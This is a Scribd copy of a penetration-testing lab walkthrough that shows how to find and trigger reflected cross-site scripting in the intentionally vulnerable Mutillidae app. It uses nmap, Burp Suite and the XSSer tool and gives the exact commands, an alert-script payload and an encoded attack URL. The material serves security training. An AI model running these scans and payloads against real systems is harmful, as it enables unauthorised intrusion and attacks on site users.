0% found this document useful (0 votes)
47 views12 pages

Walkthrough 1889

This document outlines 18 steps to complete an XSS attack on a vulnerable web application using the XSSer tool. The steps include identifying open ports on the target using Nmap, accessing the vulnerable pages in Firefox, intercepting requests with Burp Suite, using XSSer to generate payloads, and triggering the XSS vulnerabilities by passing the payloads to the target. References for Burp Suite, Mutillidae (the vulnerable web app), and XSSer are also provided.

Uploaded by

Ayoub Amellaln
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
47 views12 pages

Walkthrough 1889

This document outlines 18 steps to complete an XSS attack on a vulnerable web application using the XSSer tool. The steps include identifying open ports on the target using Nmap, accessing the vulnerable pages in Firefox, intercepting requests with Burp Suite, using XSSer to generate payloads, and triggering the XSS vulnerabilities by passing the payloads to the target. References for Burp Suite, Mutillidae (the vulnerable web app), and XSSer are also provided.

Uploaded by

Ayoub Amellaln
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 12

r

Name XSS Attack with XSSer

URL https://attackdefense.com/challengedetails?cid=1889

Type Webapp Pentesting Basics

Important Note: This document illustrates all the important steps required to complete this lab.
This is by no means a comprehensive step-by-step solution for this exercise. This is only
provided as a reference to various commands needed to complete this exercise and for your
further research on this topic. Also, note that the IP addresses and domain names might be
different in your lab.

Step 1: ​Start the terminal and check the IP address of the machine.

Command: ​ip addr

The IP address of the attacker machine is 192.94.37.2, the target machine will be located at IP
address 192.94.37.3

Step 2:​ Run a Nmap scan against the target IP.

Command: ​nmap -sS -sV 192.94.37.3


Port 80 and 3306 are open.

Step 3: ​Access the web application using firefox.

Command: ​firefox http://192.94.37.3

Step 4: ​Navigate to the XSS DNS lookup webpage.

URL: ​http://192.94.37.3/index.php?page=dns-lookup.php
Step 5: ​Enter any text to “​Hostname/IP​” textfield and click on "Lookup DNS"

The entered value is reflected back on the web page.

Step 6: ​Check the usage of xsser.

Command:​ xsser --help

Step 7: ​Configure firefox to use burp suite proxy.


Step 8: ​Start burp suite.

Step 9: ​Enter any text to “​Hostname/IP​” textfield and click on "Lookup DNS". The request will
be intercepted by burp suite.
Step 10: ​Pass the URL to XSSER. Replace “​HelloWorld​” with “​XSS”​, this is done so that
XSSer will substitute payload in place of "XSS" string.

Command:​ xsser --url 'http://192.94.37.3/index.php?page=dns-lookup.php' -p


'target_host=XSS&dns-lookup-php-submit-button=Lookup+DNS'

The output confirms that the target is vulnerable.


Step 11: ​Trying various XSS payloads by using XSSer's “--auto” option.

Command:​ xsser --url 'http://192.94.37.3/index.php?page=dns-lookup.php' -p


'target_host=XSS&dns-lookup-php-submit-button=Lookup+DNS' --auto

Step 12: ​Using custom XSS payload.

Command: ​xsser --url 'http://192.94.37.3/index.php?page=dns-lookup.php' -p


'target_host=XSS&dns-lookup-php-submit-button=Lookup+DNS' --Fp "<script>alert(1)</script>"
The encoded XSS payload is generated.

Step 13: ​In Burp Suite, replace the POST parameters with the final attack payload and forward
the request.

The XSS payload will be triggered.


.
Step 14: ​Performing XSS attack over GET request. Navigate to the ​Poll Question​ webpage.

URL:​ http://192.94.37.3/index.php?page=user-poll.php

Step 15: ​Enter any value and submit the vote.


The value nmap is reflected on the web page

Step 16:​ Copy the URL, replace the nmap value with "XSS" and pass it to XSSer

URL:
http://192.94.37.3/index.php?page=user-poll.php&csrf-token=&choice=​nmap​&initials=jd&user-p
oll-php-submit-button=Submit+Vote

Command:​ xsser --url


“http://192.94.37.3/index.php?page=user-poll.php&csrf-token=&choice=​XSS​&initials=jd&user-po
ll-php-submit-button=Submit+Vote”
Step 17: ​Providing basic XSS payload to XSSer

Command:​ xsser --url


"http://192.94.37.3/index.php?page=user-poll.php&csrf-token=&choice=XSS&initials=jd&user-po
ll-php-submit-button=Submit+Vote" --Fp "<script>alert(1)</script>"

Step 18: ​Open the final attack link to trigger the XSS vulnerability in firefox browser.

URL:
http://192.94.37.3/index.php?page=user-poll.php&csrf-token=&choice=%3Cscript%3Ealert%281
%29%3C%2Fscript%3E&initials=jd&user-poll-php-submit-button=Submit+Vote
References

1. Burp Suite (​https://portswigger.net/burp​)


2. Mutillidae II (​https://sourceforge.net/projects/mutillidae/​)
3. XSSer Tool (​https://github.com/epsylon/xsser​)

You might also like